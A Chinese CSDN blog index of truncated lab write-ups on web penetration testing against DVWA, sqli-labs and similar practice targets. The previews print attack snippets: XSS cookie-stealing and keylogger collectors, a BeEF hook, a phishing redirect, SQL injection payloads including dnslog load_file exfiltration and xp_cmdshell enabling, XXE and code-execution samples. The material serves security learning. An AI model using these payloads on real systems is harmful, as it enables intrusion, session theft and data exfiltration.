![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web渗透
没有如果ru果
这个作者很懒,什么都没留下…
展开
-
各端口可能存在的漏洞
-| 端口号 | 端口说明 | 攻击技巧 |-|——–|——–|——–|-|21/22/69 |ftp/tftp:文件传输协议 |爆破\嗅探\溢出\后门|-|22 |ssh:远程连接 |爆破OpenSSH;28个退格|-|23 |telnet:远程连接 |爆破\嗅探|-|25 |smtp:邮件服务 |邮件伪造|-|53 |DNS:域名系统 |DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙|-|67/68 |dhcp |劫持\欺骗|-|110 |pop3原创 2020-05-16 11:50:15 · 978 阅读 · 0 评论 -
信息泄露漏洞
信息泄露主要包括:敏感路径、服务器、中间件、框架版本等实验环境:ubuntu实验原理: 配置存放不当,导致web系统备份,数据库备份用户数据文件,暴露在web系统上,引发信息泄露实验内容:一、目录遍历漏洞原理:index文件是web应用程序的默认入口文件被称为索引文件。访问web应用程序时如果没有指定某个文件,web应用程序就会调用索引文件。根据web开发脚本...原创 2020-03-04 20:04:28 · 6039 阅读 · 0 评论 -
typecho反序列化漏洞
Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理。实验环境:php5.4实验步骤:1.漏洞形成的原因2.由于对finish参数、请求头HTTP_HOST及post_typecho_config数据进行验证,所以...原创 2020-03-02 21:36:34 · 728 阅读 · 0 评论 -
struts2反序列化漏洞
Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。实验环境:vulhub中的struts实验步骤:可利用struts2扫描工具扫描是否有该漏洞,输入python3Struts2Scan.py -u http://192.168.1.103...原创 2020-03-02 20:54:00 · 2926 阅读 · 0 评论 -
逻辑漏洞
实验环境:php、Apache实验原理:由于网站开发人员在建设网站的时候验证不合格,造成的bug,本次实验以任意用户重置密码为例实验条件:修改密码时会发送修改的url到指定邮箱,并且此url长期有效。实验危害:1.任意用户重置密码 2.提权/越权 3.任意金额购买 4.验证...原创 2020-03-02 20:12:46 · 672 阅读 · 0 评论 -
php反序列化漏洞
实验环境:Apache、php5.4实验原理:是由于程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通实验步骤:实验一:php代码如下:<?phpclass Person{ var $n...原创 2020-02-28 18:52:56 · 219 阅读 · 0 评论 -
命令执行漏洞
实验环境:DVWA、Apache、php5.2实验原理: 日常的网络访问中,我们常常可以看到某些Web网站具有执行系统命令的功能,比如:有些网站提供ping功能,我们可以输入一个IP地址,它就会帮我们去尝试ping目标的IP地址,而我们则可以看到执行结果。但是如果用户没有遵循网站的本意,而去输入精心构造的指令,可能会对网站本身的功能逻辑产生逆转,导致让目标网站执行恶意命令。...原创 2020-02-27 18:00:27 · 715 阅读 · 0 评论 -
代码执行漏洞
实验环境:php5.2、Apache实验原理:当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞实验步骤:实验一:1.php代码如下:<?php $data=$_GET['data']; echo preg_replace("/test/e",$data,"just test");?>2.在前端给da...原创 2020-02-27 17:37:35 · 583 阅读 · 0 评论 -
XXE漏洞练习
实验环境:xml、Apache、Pika出漏洞练习平台实验原理:该漏洞也被称为XML外部实体注入攻击漏洞,它是指XML代码的DTD声明外部实体时实体内容为一些敏感的本地文件路径或攻击链接或127.0.0.1:端口实验步骤:1.XML值如下:<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE name[<!E...原创 2020-02-26 20:45:49 · 813 阅读 · 0 评论 -
SSRF漏洞的复现
实验环境:Ubuntu虚拟机上安装vulhub漏洞环境实验原理:由于服务端提供了从其他服务器应用获取数据的功能,并且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。实验步骤:1.进入vulhub-master/weblogic/ssrf目录,输入docker-compose up -d启动环境2.输入ifconfig查看ip...原创 2020-02-26 20:02:36 · 2015 阅读 · 0 评论 -
XSSGames
实验环境:第一关:在参数的位置输入<script>alert(1)</script>,成功来到第二关第二关:在写参数的位置输入2"onclick="alert(1),成功闯入第三关第三关:...原创 2020-02-25 22:51:14 · 633 阅读 · 1 评论 -
CSRF漏洞实验报告
实验环境:DVWA、Apache实验原理:CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用普通用户的身份(cookie)完成攻击行为实验内容:实验一:修改密码(低级别DVWA)1.构造一个网址:http://192.168.1.101/1.htmlht...原创 2020-02-25 20:52:43 · 1886 阅读 · 1 评论 -
XSS漏洞高级应用
实验环境:DVWA实验原理:钓鱼式攻击是一种企图从电子通讯中,通过伪装成信誉卓著的法人媒体以获得如用户名、密码和信用卡明细等个人敏感信息的犯罪诈骗过程,它常常导引用户到URL与界面外观与真正网站几无二致的假冒网站输入个人数据实验一:重定向钓鱼,即将当前页面重定向到一个钓鱼页面举例代码如下:<script>document.location="http://www.ba...原创 2020-04-03 10:23:46 · 1089 阅读 · 0 评论 -
搭建XSS平台——XSS工具的利用
实验一:kali下的BeEF实验环境:kali、DVWA实验步骤:1、打开kali的命令行,输入:beef-xs,获得一个js脚本,并跳出beef登录界面,输入用户名和密码(默认都是beef)2、输入ifconfig查看ip,复制js代码,并将ip改为本机ip,此时js代码如下:<script src="http://192.168.1.106:3000/hook....原创 2020-02-24 20:28:05 · 2397 阅读 · 0 评论 -
XSS漏洞利用——键盘记录
实验环境:DVWA实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器实验步骤:一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。php代码如下:<?php$file=fopen("key.txt","a");if(isset($_REQUEST['key']...原创 2020-02-21 17:48:59 · 1361 阅读 · 0 评论 -
XSS漏洞利用——获取cookie
实验环境:DVWA实验步骤:一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt中php代码如下:<?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); }?>...原创 2020-02-20 21:02:26 · 1734 阅读 · 0 评论 -
XSS漏洞利用——验证cookie
实验环境:DVWA、火狐浏览器、bp工具实验步骤:一、访问DVWA,登录进去,并抓包获取cookie值二、访问文件包含界面三、重新打开浏览器,输入网址直接访问文件包含,发现无法进入四、抓包文件包含页面,并替换cookie值,即可访问成功...原创 2020-02-20 19:53:33 · 922 阅读 · 0 评论 -
XSS分类
实验环境:DVWA低级别(火狐浏览器)实验步骤:一、反射型XSS漏洞该漏洞又称非持久性XSS1.选择反射型XSS,在输入框输入任意参数2.修改参数的值为:<script>alert(/cxr/)</script>,弹出下面窗口,再次点击无法出现该窗口二、储存型XSS漏洞又称持久性XSS漏洞1.在留言框输入任意值,都会在下面显示...原创 2020-02-20 19:34:27 · 651 阅读 · 1 评论 -
文件包含漏洞
实验环境:DVWA实验步骤:本地文件包含DVWA低级别1.设置级别2.输入本地路径:D:\phpStudy\PHPTutorial\MySQL\my.ini可查看该路径下的配置内容DVWA中级别1.设置级别2.输入本地路径:http://localhost/DVWA-master/vulnerabilities/fi/?page=D:\phpStudy...原创 2020-02-19 23:20:50 · 573 阅读 · 1 评论 -
文件上传的防御
一、将文件上传目录的所有用户执行权限全部取消二、判断文件类型 在判断文件类型时,可以结合使用MIME Type、后缀检查等方式。在文件类型检查中,强烈推荐白名单方式,黑名单的方式已经 无数次被证明是不可靠的。此外, 对于图片的处理,可以使用压缩函数或者resize函数,在处理图片的同时破坏图片中可能包含的 HTML代码,或者在使用白名单的时候,使用分割字符串(上传来的文...原创 2020-02-19 13:57:38 · 2420 阅读 · 0 评论 -
条件竞争漏洞
条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的。因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。以upload—labsPass17为例:1.查看其源码...原创 2020-02-19 11:33:42 · 646 阅读 · 0 评论 -
fastcgi配置不当造成的解析漏洞
实验环境:IIS 7.0/IIS 7.5/Nginx <=0.8.37实验步骤:一、漏洞环境的搭建1.安装xampp,只需要其中的php2.安装iis服务器点击服务器管理器——角色——添加角色——选择web服务器点击下一步——选择以下勾选项——点击下一步——安装(注:一定要将cgi模块勾选)3.关闭防火墙4.访问该机的网站,看到可正常访问...原创 2020-02-19 11:22:44 · 1019 阅读 · 1 评论 -
iis6.0解析漏洞
实验环境:iis6.0实验步骤:目录解析漏洞:1.在C:\Inetpub\wwwroot目录下创建1.asp目录,并在目录中创建1.txt文件,在文件中写入下面内容2.访问该路径文件解析漏洞:1.在iis目录下创建一个以下格式的文件2.访问该路径...原创 2020-02-17 22:25:47 · 1036 阅读 · 0 评论 -
apache解析漏洞
实验环境:Apache实验原理:Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.a.b的“.a”和”.b” 这两种后缀是apache不可识别解析,apache就会把test.php.a.b解析成test.php。实验步骤:本身存在的漏洞:1.新建一个phpinfo.php.aaa文件,并编辑其内容为下面内容...原创 2020-02-17 22:07:14 · 1145 阅读 · 0 评论 -
.htaccess文件解析漏洞
一、.htaccess文件该文件提供了针对目录改便配置的方法。即在一个特定的文档目录中放置一个包含一个或者多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。二、apache的解析漏洞...原创 2020-02-17 21:41:42 · 4053 阅读 · 0 评论 -
ewebeditor编辑器解析漏洞
实验环境:ewebeditor编辑器实验步骤:一、搭建环境1.将下载好的eweb目录放到C:\Inetpub\wwwroot目录下2.给eweb文件夹设置权限,依次点击:右键——属性——安全,将Internet 来宾用户和IIS_WAP用户得权限都设置成完全控制3.在浏览器输入IP/eweb/admin_login.asp即可进入到下面界面:二、解析漏洞...原创 2020-02-17 21:01:30 · 1014 阅读 · 0 评论 -
upload—labs 实验
Pass011.将上传的php文件后缀名改为jpg,并用bp抓包2.在bp修改数据,并按forward,文件上传成功Pass03将文件后缀名改为phtml,上传文件,文件上传成功Pass5将文件后缀名改为phP,上传文件,文件上传成功Pass06用bp抓包,修改后缀名,在后缀名后加空格,按forward,文件上传成功Pass7bp抓包修改...原创 2020-02-14 00:09:04 · 561 阅读 · 0 评论 -
文件上传——后台上传文件并进行后缀名和大小限制
实验环境:php实验要求:仅能上传jpg格式的文件,且不得大于20K实验步骤:一、html代码如下:<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Title</title> <meta ...原创 2020-02-13 22:09:07 · 1935 阅读 · 0 评论 -
文件上传——js验证及如何绕过js验证
实验环境:php和html实验步骤:一、文件上传——js验证html代码如下:<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Title</title> <meta charset="ut...原创 2020-02-13 21:37:32 · 1599 阅读 · 0 评论 -
利用xp cmdshell执行系统命令
一、首先要进入master,这里要用;隔开,有点类似堆叠查询输入:http://192.168.1.106/1.php?id=1;use master;可看到没什么变化二、开启高级功能输入:http://192.168.1.106/1.php?id=1;use master;exec sp_configure 'show advanced options',1;reconfigur...原创 2020-02-13 00:16:18 · 3037 阅读 · 1 评论 -
sql注入——sqlserver报错注入
该注入的条件是必须有报错信息用到函数convert(int,(select top 1 db_name() )),其含义是将第二个参数的值转换成第一个参数的int类型一、打开文件,如下图所示,有报错信息:二、查看数据库输入:http://192.168.1.106/1.php?id=1 and 1=convert(int,(select top 1 db_name()));这里...原创 2020-02-12 23:25:25 · 5957 阅读 · 4 评论 -
sql注入——sqlserver联合查询
实验环境:sqlserver 2008实验步骤:一、判断是否有注入分别输入ip/1.php?id=1 and 1=1和ip/1.php?id=1 and 1=2可判断出该处存在注入二、判断显示位1.输入http://192.168.1.106/1.php?id=1 order by 3,显示出第三列2.输入http://192.168.1.106/1.php?id=...原创 2020-02-12 22:45:33 · 641 阅读 · 2 评论 -
sql注入——sqlmap的基本使用
一、以sql labs1为例1.用sql labs的地址为例,打开cmd,输入python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1由上图我们可以看到返回的网址是mysql类型的,经过扫描可看到注入类型有以上几种2.输入:python sqlmap.py -u http://localhost/sqli-...原创 2020-02-11 23:34:29 · 720 阅读 · 0 评论 -
sql注入——waf绕过
Waf是Web应用防护系统,也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。sql注入绕waf常用方式有以下几种:1.大小写混合 uNIoN sELecT 1,2,3,42.替换关键字 selselectect 1,2,3,43....原创 2020-02-11 19:47:56 · 548 阅读 · 0 评论 -
sql注入——宽字节注入
宽字节注入是利用MySQL的一个特性,MySQL在使用GBK编码时,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围)在sql注入时,addslashes()函数会把你输入的sql语句中的单引号(’),双引号(")等特殊字符转义掉,使之变成字符串,这个时候就需要用到宽字节注入。以sql labs32为例1.在sql labs32中输入http://localho...原创 2020-02-11 18:30:35 · 346 阅读 · 0 评论 -
sql注入——堆叠注入
堆叠注入即多语句注入,多条语句用;隔开以sql labs38为例1.在dnslog上获取2.在sql labs38上输入多条语句:http://localhost/sqli-labs-master/Less-38/?id=1'; select load_file("\\\\9shl7n.dnslog.cn\\dsfs"); -- -3.可看到在dnslog上执行成功...原创 2020-02-10 22:21:21 · 459 阅读 · 0 评论 -
sql注入——dns的带外注入
以sql labs8为例1.搜索dns.log在线软件,并get一个域名2.在cmd中ping该域名,发现解析成功3.在sql labs8中输入http://localhost/sqli-labs-master/Less-8/?id=1' and load_file("\\\\sss.cipv66.dnslog.cn\\xxx.txt") -- -,并执行4.在dn...原创 2020-02-10 21:56:04 · 3593 阅读 · 5 评论 -
sql注入——读写文件
读写文件受到权限影响,权限是:secure_file_priv,权限的位置在数据库的配置文件my.ini中1.secure_file_priv= 代表对文件读写没有限制2.secure_file_priv=NULL 代表不能进行文件读写3.secure_file_priv=d:/phpstudy/mysql 代表只能对该路径下文件进...原创 2020-02-10 21:10:40 · 3399 阅读 · 2 评论 -
sql注入——二次注入
二次注入原理,主要分为两步第一步:插入恶意数据 第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留的原来的数据,但是数据本身包含恶意内容。第二步:引用恶意数据 在将数据存入数据库后,开发者认为数据是可信的,在下一次需要进行的查询的时候,直接从数据库中提出了恶意数据,没有进行进一步的检验和...原创 2020-02-10 20:20:51 · 2044 阅读 · 0 评论 -
mysql 联合查询注入
一、在low级别的安全下,对dvwa进行sql注入1.判断漏洞类型由此可知:sql注入漏洞类型为:'为边界的字符串型2.判断列数和显示位3.确定数据库:1' union select 1,database()-- -4.查看数据库的表:1' union select 2,(select group_concat(table_name) from informat...原创 2020-01-07 00:32:24 · 368 阅读 · 0 评论